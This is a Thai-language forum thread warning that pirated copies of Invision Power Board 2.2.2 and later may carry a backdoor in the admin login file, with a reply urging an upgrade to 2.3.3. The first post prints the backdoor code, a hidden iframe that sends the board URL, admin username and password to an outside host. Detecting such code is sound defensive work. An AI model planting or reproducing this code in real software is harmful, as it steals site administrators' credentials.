Results 1 to 3 of 3

Thread: ผู้ใช้ Board IPB 2.2.2 ขั้นไประวัง !!

  1. #1
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    ใครใช้ IPB (Invision Power Board) Version 2.2.2 ขึ้นไปที่โหลดจากเว็บใต้ดินต่างๆมีโอกาสที่มี Code Backdoor ฝังอยู่
    ให้เข้าไปเช็คดูที่ <forumfolder>/sources/action_admin/login.php

    [hide=20]
    Code:
    $connector

    หากพบ Backdoor อยู่ด้านล่างจะมี Code เขียนไว้ทำนองนี้


    [code]$connector = &#39;&lt;script>window.stuats=\&#39;\&#39;;</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=&#39; . htmlentities($this->ipsclass->vars[&#39;board_url&#39;]) . &#39;&user=&#39; . htmlentities($this->ipsclass->input[&#39;username&#39;]) . &#39;&pass=&#39; . htmlentities($this->ipsclass->input[&#39;password&#39;]) . &#39;\"></div>&#39;;

  2. #2
    Junior Member
    Join Date
    Oct 2007
    Posts
    23


    ให้ข้อมูลเพิ่มเติม จาก ipbthailand คับ เพื่อเป็นแนวทางอีกที่นึง

    **Hidden Content: To see this hidden content your post count must be 5 or greater.**


    ตอนนี้ล่าสุด เป็น 2.3.3 นะคับ ใครที่ใช้รุ่นเก่าอยู่ รีบเปลี่ยนได้เลยนะคับ โดยเฉพาะ คนที่ใช้ ตั้งแต่ 2.2 และ 2.3.2 (2.3.2 บัคเยอะมากคับ เลยต้องออก 2.3.3 มาแก้ แล้วก็แก้ได้เป็นที่เรียบร้อย)

  3. #3
    Junior Member
    Join Date
    Aug 2008
    Posts
    11


    Nice zero-days! I couldn&#39;t find this anywhere on google!

    Glad I found this site and I shall be contributing much more.

Similar Threads

  1. ผู้ใช้ Firefox ระวัง spyware เลียนแบบ Flash Player
    By haiaiuyha in forum บทความ คอมพิวเตอร์ ทัวไป
    Replies: 2
    Last Post: 11-09-2009, 11:08 PM
  2. Replies: 3
    Last Post: 10-09-2009, 10:46 AM
  3. Replies: 4
    Last Post: 30-06-2009, 12:51 PM
  4. Replies: 0
    Last Post: 01-01-1970, 07:00 AM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Who's Online (0)
0
0